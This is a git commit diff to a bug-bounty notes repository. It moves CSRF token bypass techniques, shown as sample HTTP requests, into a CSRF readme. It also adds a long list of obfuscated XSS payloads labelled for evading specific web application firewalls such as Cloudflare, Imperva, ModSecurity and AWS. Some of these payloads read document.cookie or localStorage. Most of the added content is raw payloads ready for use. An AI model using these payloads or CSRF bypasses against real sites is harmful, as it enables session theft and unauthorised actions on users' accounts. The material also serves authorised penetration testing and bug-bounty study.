feat: added XSS payloads to bypass WAF

master
Muhammad Daffa 2022-11-08 18:29:04 +07:00
parent 5c6916174a
commit 4f51606813
5 changed files with 207 additions and 171 deletions

View File

@ -1,30 +0,0 @@
# Bypass 304 (Not Modified)
1. Delete "If-None-Match" header
```
GET /admin HTTP/1.1
Host: target.com
If-None-Match: W/"32-IuK7rSIJ92ka0c92kld"
```
Try this to bypass
```
GET /admin HTTP/1.1
Host: target.com
```
2. Adding random character in the end of "If-None-Match" header
```
GET /admin HTTP/1.1
Host: target.com
If-None-Match: W/"32-IuK7rSIJ92ka0c92kld"
```
Try this to bypass
```
GET /admin HTTP/1.1
Host: target.com
Host: target.com
If-None-Match: W/"32-IuK7rSIJ92ka0c92kld" b
```
## References
* [https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521](https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521)

View File

@ -1,120 +0,0 @@
# Bypass CSRF
1. Change single character
```
POST /register HTTP/1.1
Host: target.com
...
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
```
Try this to bypass
```
POST /register HTTP/1.1
Host: target.com
...
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab
```
2. Sending empty value of token
```
POST /register HTTP/1.1
Host: target.com
...
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
```
Try this to bypass
```
POST /register HTTP/1.1
Host: target.com
...
username=dapos&password=123456&token=
```
3. Replace the token with same length
```
POST /register HTTP/1.1
Host: target.com
...
username=dapos&password=123456&token=aaaaaa
```
Try this to bypass
```
POST /register HTTP/1.1
Host: target.com
...
username=dapos&password=123456&token=aaabaa
```
4. Changing POST / GET method
```
POST /register HTTP/1.1
Host: target.com
...
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
```
Try this to bypass
```
GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1
Host: target.com
...
```
5. Remove the token from request
```
POST /register HTTP/1.1
Host: target.com
...
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
```
Try this to bypass
```
POST /register HTTP/1.1
Host: target.com
...
username=dapos&password=123456
```
6. Use another user's valid token
```
POST /register HTTP/1.1
Host: target.com
...
username=dapos&password=123456&token=ANOTHER_VALID_TOKEN
```
7. Try to decrypt hash
```
POST /register HTTP/1.1
Host: target.com
...
username=dapos&password=123456&token=MTIzNDU2
```
MTIzNDU2 => 123456 with base64
8. Sometimes anti-CSRF token is composed by 2 parts, one of them remains static while the others one dynamic
```
POST /register HTTP/1.1
Host: target.com
...
username=dapos&password=123456&token=vi802jg9f8akd9j123
```
When we register again, the request like this
```
POST /register HTTP/1.1
Host: target.com
...
username=dapos&password=123456&token=vi802jg9f8akd9j124
```
If you notice "vi802jg9f8akd9j" part of the token remain same, you just need to send with only static part

View File

@ -4,7 +4,7 @@
Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated
## Where to find
Usually found in forms. Try submit the form and check the HTTP request. If the HTTP request does not have a CSRF token then it is likely to be vulnerable to a CSRF attack. But in some cases, the CSRF token can be bypassed, try check this [List](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md)
Usually found in forms. Try submit the form and check the HTTP request. If the HTTP request does not have a CSRF token then it is likely to be vulnerable to a CSRF attack.
## How to exploit
1. HTML GET Method
@ -93,3 +93,125 @@ xhr.send('{"role":admin}');
<br>
</body>
```
# Bypass CSRF Token
But in some cases, even though there is a CSRF token on the form on the website. CSRF tokens can still be bypassed by doing a few things:
1. Change single character
```
POST /register HTTP/1.1
Host: target.com
...
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
```
Try this to bypass
```
POST /register HTTP/1.1
Host: target.com
...
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab
```
2. Sending empty value of token
```
POST /register HTTP/1.1
Host: target.com
...
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
```
Try this to bypass
```
POST /register HTTP/1.1
Host: target.com
...
username=dapos&password=123456&token=
```
3. Replace the token with same length
```
POST /register HTTP/1.1
Host: target.com
...
username=dapos&password=123456&token=aaaaaa
```
Try this to bypass
```
POST /register HTTP/1.1
Host: target.com
...
username=dapos&password=123456&token=aaabaa
```
4. Changing POST / GET method
```
POST /register HTTP/1.1
Host: target.com
...
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
```
Try this to bypass
```
GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1
Host: target.com
...
```
5. Remove the token from request
```
POST /register HTTP/1.1
Host: target.com
...
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
```
Try this to bypass
```
POST /register HTTP/1.1
Host: target.com
...
username=dapos&password=123456
```
6. Use another user's valid token
```
POST /register HTTP/1.1
Host: target.com
...
username=dapos&password=123456&token=ANOTHER_VALID_TOKEN
```
7. Try to decrypt hash
```
POST /register HTTP/1.1
Host: target.com
...
username=dapos&password=123456&token=MTIzNDU2
```
MTIzNDU2 => 123456 with base64
8. Sometimes anti-CSRF token is composed by 2 parts, one of them remains static while the others one dynamic
```
POST /register HTTP/1.1
Host: target.com
...
username=dapos&password=123456&token=vi802jg9f8akd9j123
```
When we register again, the request like this
```
POST /register HTTP/1.1
Host: target.com
...
username=dapos&password=123456&token=vi802jg9f8akd9j124
```
If you notice "vi802jg9f8akd9j" part of the token remain same, you just need to send with only static part

View File

@ -344,31 +344,22 @@ javascript://%250Aalert(1)
```
<svg%0Aonauxclick=0;[1].some(confirm)//
<svg onload=alert%26%230000000040"")>
<svg/onload={alert`1`}>
<a/href=j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(1)&rpar;>
<svg onx=() onload=(confirm)(1)>
<svg onx=() onload=(confirm)(document.cookie)>
<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
"><onx=[] onmouseover=prompt(1)>
%2sscript%2ualert()%2s/script%2u -xss popup
<svg onload=alert%26%230000000040"1")>
%2sscript%2ualert()%2s/script%2u
"Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"/*/Onx=""//onfocus=prompt(1)>"//Onx=""/*/%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1`)"Onclick="([1].map(confirm))
[1].map(confirm)'ale'+'rt'()a&Tab;l&Tab;e&Tab;r&Tab;t(1)prompt&lpar;1&rpar;prompt&#40;1&#41;prompt%26%2300000000000000000040;1%26%2300000000000000000041;(prompt())(prompt``)
<svg onload=alert%26%230000000040"1")>
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
@ -379,11 +370,84 @@ Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
<a id=x tabindex=1 onbeforedeactivate=print(`XSS`)></a><input autofocus>
<img ignored=() src=x onerror=prompt(1)>
<svg onx=() onload=(confirm)(1)>
<--`<img/src=` onerror=confirm``> --!>
<img src=x onerror="a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]](document.domain)">
<j id=x style="-webkit-user-modify:read-write" onfocus={window.onerror=eval}throw/0/+name>H</j>#x
'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
'"><img/src/onerror=.1|alert``>
:javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
<img ignored=() src=x onerror=prompt(1)>
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
```
2. Cloudfront
```
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'>
<--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!>
"><--<img+src= "><svg/onload+alert(document.domain)>> --!>
```
3. Cloudbric
```
<a69/onclick=[1].findIndex(alert)>pew
```
4. Comodo WAF
```
<input/oninput='new Function`confir\u006d\`0\``'>
<p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragme
```
5. ModSecurity
```
<a href="jav%0Dascript&colon;alert(1)">
```
6. Imperva
```
<input id='a'value='global'><input id='b'value='E'><input 'id='c'value='val'><input id='d'value='aler'><input id='e'value='t(documen'><input id='f'value='t.domain)'><svg+onload[\r\n]=$[a.value+b.value+c.value](d.value+e.value+f.value)>
<x/onclick=globalThis&lsqb;'\u0070r\u006f'+'mpt']&lt;)>clickme
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
<a69/onclick=write&lpar;&rpar;>pew
<details/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];"/open>
<svg onload\r\n=$.globalEval("al"+"ert()");>
<svg/onload=self[`aler`%2b`t`]`1`>
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>
<img/src=q onerror='new Function`al\ert\`1\``'>
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
```
7. AWS
```
<script>eval(atob(decodeURIComponent(confirm`1`)))</script>
```
If you want to see the other payload for other WAF, check this [link](https://github.com/0xInfection/Awesome-WAF)
## References
- [Brute Logic](https://brutelogic.com.br/)
- [Awesome-WAF](https://github.com/0xInfection/Awesome-WAF)
- Some random twitter posts

View File

@ -22,7 +22,9 @@ These are my bug bounty notes that I have gathered from various sources, you can
- [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md)
- [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md)
- [Remote File Inclusion (RFI)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Remote%20File%20Inclusion.md)
- [Server Side Request Forgery](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Server%20Side%20Request%20Forgery.md)
- SQL Injection (SOON)
- [Web Cache Deception](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Deception.md)
- [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md)
## Checklist
@ -32,10 +34,8 @@ These are my bug bounty notes that I have gathered from various sources, you can
## List Bypass
- [Bypass 2FA](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%202FA.md)
- [Bypass 403](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md)
- [Bypass 304](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20304.md)
- [Bypass 429](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20429.md)
- [Bypass Captcha](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md)
- [Bypass CSRF](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md)
## Miscellaneous
- [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Account%20Takeover.md)
@ -50,11 +50,11 @@ These are my bug bounty notes that I have gathered from various sources, you can
- [Confluence](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Confluence.md)
- [Grafana](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Grafana.md)
- [HAProxy](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/HAProxy.md)
- [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md)
- [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md)
- [Joomla](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Joomla.md)
- [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md)
- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md)
- [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Laravel.md)
- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md)
- [Nginx](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Nginx.md)
- [WordPress](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/WordPress.md)
- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Zend.md)
@ -69,5 +69,5 @@ These are my bug bounty notes that I have gathered from various sources, you can
- [ ] Tidy up the reconnaisance folder
- [ ] Seperate the bypass from some vulnerability readme
- [ ] Writes multiple payload bypasses for each vulnerability
- [ ] Payload XSS for each WAF (Cloudflare, Cloudfront, AWS, etc)
- [x] Payload XSS for each WAF (Cloudflare, Cloudfront, AWS, etc)
- [ ] Payload SQL injection for each WAF (Cloudflare, Cloudfront)